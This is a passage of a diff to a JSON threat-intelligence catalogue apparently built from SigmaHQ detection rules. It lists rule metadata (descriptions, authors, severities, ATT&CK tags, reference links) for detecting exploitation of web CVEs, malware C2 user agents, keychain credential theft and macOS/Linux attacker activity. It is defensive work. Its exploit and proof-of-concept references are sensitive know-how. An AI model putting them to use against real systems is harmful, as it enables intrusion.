- "Unknown"
- ],
- "filename": "web_cve_2021_41773_apache_path_traversal.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://nvd.nist.gov/vuln/detail/CVE-2021-41773",
- "https://twitter.com/bl4sty/status/1445462677824761878",
- "https://twitter.com/ptswarm/status/1445376079548624899",
- "https://twitter.com/h4x0r_dz/status/1445401960371429381",
- "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782",
- "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_41773_apache_path_traversal.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5",
- "value": "CVE-2021-41773 Exploitation Attempt"
- },
- {
- "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/07/19",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2014_6287_hfs_rce.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/",
- "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md",
- "https://www.exploit-db.com/exploits/39161",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.t1505.003",
- "cve.2014.6287"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae",
- "value": "Rejetto HTTP File Server RCE"
- },
{
"description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"",
"meta": {
@@ -86599,9 +81651,9 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://www.exploit-db.com/exploits/19525",
"https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml",
"https://github.com/lijiejie/IIS_shortname_Scanner",
+ "https://www.exploit-db.com/exploits/19525",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml"
],
"tags": [
@@ -86621,128 +81673,6 @@
"uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac",
"value": "Successful IIS Shortname Fuzzing Scan"
},
- {
- "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/08/12",
- "falsepositive": [
- "Vulnerability scanners"
- ],
- "filename": "web_cve_2022_31656_auth_bypass.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_31656_auth_bypass.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80",
- "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass"
- },
- {
- "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/01/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_3452_cisco_asa_ftd.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/aboul3la/status/1286012324722155525",
- "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2020.3452"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29",
- "value": "Cisco ASA FTD Exploit CVE-2020-3452"
- },
- {
- "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539",
- "meta": {
- "author": "Tobias Michalski (Nextron Systems), Max Altgelt (Nextron Systems)",
- "creation_date": "2021/09/20",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_40539_adselfservice.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://us-cert.cisa.gov/ncas/alerts/aa21-259a",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_40539_adselfservice.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "6702b13c-e421-44cc-ab33-42cc25570f11",
- "value": "ADSelfService Exploitation"
- },
- {
- "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/02/29",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_0688_msexchange.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_0688_msexchange.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5",
- "value": "CVE-2020-0688 Exchange Exploitation via Web Log"
- },
{
"description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication",
"meta": {
@@ -86777,76 +81707,6 @@
"uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e",
"value": "Suspicious Windows Strings In URI"
},
- {
- "description": "Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack",
- "meta": {
- "author": "Arnim Rupp, Florian Roth",
- "creation_date": "2020/01/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2019_19781_citrix_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://support.citrix.com/article/CTX267027",
- "https://support.citrix.com/article/CTX267679",
- "https://twitter.com/mpgn_x64/status/1216787131210829826",
- "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md",
- "https://isc.sans.edu/diary/25686",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2019_19781_citrix_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756",
- "value": "Citrix Netscaler Attack CVE-2019-19781"
- },
- {
- "description": "Detects CVE-2020-0688 Exploitation attempts",
- "meta": {
- "author": "NVISO",
- "creation_date": "2020/02/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_0688_exchange_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/Ridter/cve-2020-0688",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_0688_exchange_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a",
- "value": "CVE-2020-0688 Exploitation Attempt"
- },
{
"description": "Detects SSTI attempts sent via GET requests in access logs",
"meta": {
@@ -86870,71 +81730,6 @@
"uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342",
"value": "Server Side Template Injection Strings"
},
- {
- "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/08/10",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "web_cve_2021_26858_iis_rce.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_26858_iis_rce.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "effee1f6-a932-4297-a81f-acb44064fa3a",
- "value": "ProxyLogon Reset Virtual Directories Based On IIS Log"
- },
- {
- "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).",
- "meta": {
- "author": "Sittikorn S, Nuttakorn Tungpoonsup",
- "creation_date": "2021/09/10",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-259a",
- "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_40539_manageengine_adselfservice_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.persistence",
- "attack.t1505.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1",
- "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit"
- },
{
"description": "Detects suspicious user agent strings used in APT malware in proxy logs",
"meta": {
@@ -86969,19 +81764,20 @@
"value": "APT User Agent"
},
{
- "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string",
+ "description": "Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.",
"meta": {
- "author": "Florian Roth (Nextron Systems)",
+ "author": "Florian Roth (Nextron Systems), Brian Ingram (update)",
"creation_date": "2022/07/08",
"falsepositive": [
"Unknown"
],
"filename": "proxy_ua_susp_base64.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
"https://blogs.jpcert.or.jp/en/2022/07/yamabot.html",
+ "https://deviceatlas.com/blog/list-of-user-agent-strings#desktop",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp_base64.yml"
],
"tags": [
@@ -86999,7 +81795,7 @@
}
],
"uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3",
- "value": "Suspicious Base64 User Agent"
+ "value": "Potential Base64 Encoded User-Agent"
},
{
"description": "Detects user agent and URI paths used by empire agents",
@@ -87048,8 +81844,8 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://twitter.com/jhencinski/status/1102695118455349248",
"https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/",
+ "https://twitter.com/jhencinski/status/1102695118455349248",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"
],
"tags": [
@@ -87161,8 +81957,8 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw",
"https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/",
+ "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw",
"https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_exchange_owassrf_poc_exploitation.yml"
],
@@ -87373,9 +82169,9 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
+ "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
"https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/",
"https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/",
- "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_telegram_api.yml"
],
"tags": [
@@ -87466,14 +82262,14 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents",
"http://www.botopedia.org/search?searchword=scan&searchphrase=all",
- "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q",
- "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules",
"https://networkraptor.blogspot.com/2015/01/user-agent-strings.html",
- "https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large",
+ "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents",
"https://twitter.com/crep1x/status/1635034100213112833",
+ "https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large",
+ "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q",
"https://perishablepress.com/blacklist/ua-2013.txt",
+ "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_malware.yml"
],
"tags": [
@@ -87506,9 +82302,9 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638",
"https://blog.talosintelligence.com/ipfs-abuse/",
"https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11",
+ "https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml"
],
"tags": [
@@ -87584,8 +82380,8 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://rclone.org/",
"https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone",
+ "https://rclone.org/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_rclone.yml"
],
"tags": [
@@ -87639,29 +82435,6 @@
"uuid": "1ddf4596-1908-43c9-add2-1d2c2fcc4797",
"value": "Potential OWASSRF Exploitation Attempt - Proxy"
},
- {
- "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proxy_malware_3cx_compromise_c2_beacon_activity.yml",
- "level": "high",
- "logsource.category": "proxy",
- "logsource.product": "No established product",
- "refs": [
- "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_malware_3cx_compromise_c2_beacon_activity.yml"
- ],
- "tags": [
- "attack.command_and_control"
- ]
- },
- "uuid": "3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26",
- "value": "Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy"
- },
{
"description": "Detects suspicious user agent strings used by crypto miners in proxy logs",
"meta": {
@@ -87796,30 +82569,6 @@
"uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6",
"value": "iOS Implant URL Pattern"
},
- {
- "description": "Detects potential malicious .ICO files download from a compromised 3CXDesktopApp via web requests to the the malicious Github repository",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/31",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proxy_malware_3cx_compromise_susp_ico_requests.yml",
- "level": "high",
- "logsource.category": "proxy",
- "logsource.product": "No established product",
- "refs": [
- "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/",
- "https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_malware_3cx_compromise_susp_ico_requests.yml"
- ],
- "tags": [
- "attack.command_and_control"
- ]
- },
- "uuid": "76bc1601-9546-4b75-9419-06e0e8d10651",
- "value": "Potential Compromised 3CXDesktopApp ICO C2 File Download"
- },
{
"description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike",
"meta": {
@@ -87917,8 +82666,8 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://www.advanced-ip-scanner.com/",
"https://www.advanced-port-scanner.com/",
+ "https://www.advanced-ip-scanner.com/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_adv_ip_port_scanner_upd_check.yml"
],
"tags": [
@@ -87938,6 +82687,39 @@
"uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d",
"value": "Advanced IP/Port Scanner Update Check"
},
+ {
+ "description": "Detects suspicious encoded User-Agent strings, as seen used by some malware.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/04",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proxy_ua_base64_encoded.yml",
+ "level": "medium",
+ "logsource.category": "proxy",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://deviceatlas.com/blog/list-of-user-agent-strings#desktop",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_base64_encoded.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1071.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "d443095b-a221-4957-a2c4-cd1756c9b747",
+ "value": "Suspicious Base64 Encoded User-Agent"
+ },
{
"description": "Detects download of certain file types from hosts in suspicious TLDs",
"meta": {
@@ -87951,10 +82733,10 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap",
- "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf",
- "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/",
"https://www.spamhaus.org/statistics/tlds/",
+ "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/",
+ "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf",
+ "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml"
],
"tags": [
@@ -87991,29 +82773,6 @@
"uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19",
"value": "Download From Suspicious TLD - Blacklist"
},
- {
- "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/02/08",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proxy_apt_domestic_kitten.yml",
- "level": "high",
- "logsource.category": "proxy",
- "logsource.product": "No established product",
- "refs": [
- "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_apt_domestic_kitten.yml"
- ],
- "tags": [
- "attack.command_and_control"
- ]
- },
- "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1",
- "value": "Domestic Kitten FurBall Malware Pattern"
- },
{
"description": "Detects Malleable Amazon Profile",
"meta": {
@@ -88236,8 +82995,8 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules",
"https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb",
+ "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_hacktool.yml"
],
"tags": [
@@ -88567,8 +83326,8 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
- "https://objective-see.org/blog/blog_0x4B.html",
"https://redcanary.com/blog/applescript/",
+ "https://objective-see.org/blog/blog_0x4B.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml"
],
"tags": [
@@ -88651,8 +83410,8 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
- "https://ss64.com/osx/osacompile.html",
"https://redcanary.com/blog/applescript/",
+ "https://ss64.com/osx/osacompile.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml"
],
"tags": [
@@ -88685,9 +83444,9 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
- "https://ss64.com/osx/sysadminctl.html",
- "https://ss64.com/osx/dscl.html",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos",
+ "https://ss64.com/osx/dscl.html",
+ "https://ss64.com/osx/sysadminctl.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_add_to_admin_group.yml"
],
"tags": [
@@ -89217,8 +83976,8 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
- "https://ss64.com/osx/sysadminctl.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md",
+ "https://ss64.com/osx/sysadminctl.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml"
],
"tags": [
@@ -89474,9 +84233,9 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
+ "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml",
"https://www.manpagez.com/man/8/firmwarepasswd/",
"https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web",
- "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml"
],
"tags": [
@@ -90034,8 +84793,8 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md",
"https://gist.github.com/Capybara/6228955",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml"
],
"tags": [
@@ -90102,9 +84861,9 @@
"logsource.category": "No established category",
"logsource.product": "qualys",
"refs": [
- "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists",
"https://www.cisecurity.org/controls/cis-controls-list/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml"
],
@@ -90124,8 +84883,8 @@
"logsource.category": "No established category",
"logsource.product": "qualys",
"refs": [
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://www.cisecurity.org/controls/cis-controls-list/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml"
],
@@ -90147,8 +84906,8 @@
"logsource.category": "No established category",
"logsource.product": "No established product",
"refs": [
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://www.cisecurity.org/controls/cis-controls-list/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml"
],
@@ -90585,8 +85344,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/",
"https://linux.die.net/man/1/xclip",
+ "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml"
],
"tags": [
@@ -90653,8 +85412,8 @@
"logsource.product": "linux",
"refs": [
"https://linux.die.net/man/8/insmod",
- "https://man7.org/linux/man-pages/man8/kmod.8.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md",
+ "https://man7.org/linux/man-pages/man8/kmod.8.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml"
],
"tags": [
@@ -90757,8 +85516,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://imagemagick.org/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md",
+ "https://imagemagick.org/",
"https://linux.die.net/man/1/import",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml"
],
@@ -90859,10 +85618,10 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
+ "https://mn3m.info/posts/suid-vs-capabilities/",
+ "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/",
"https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099",
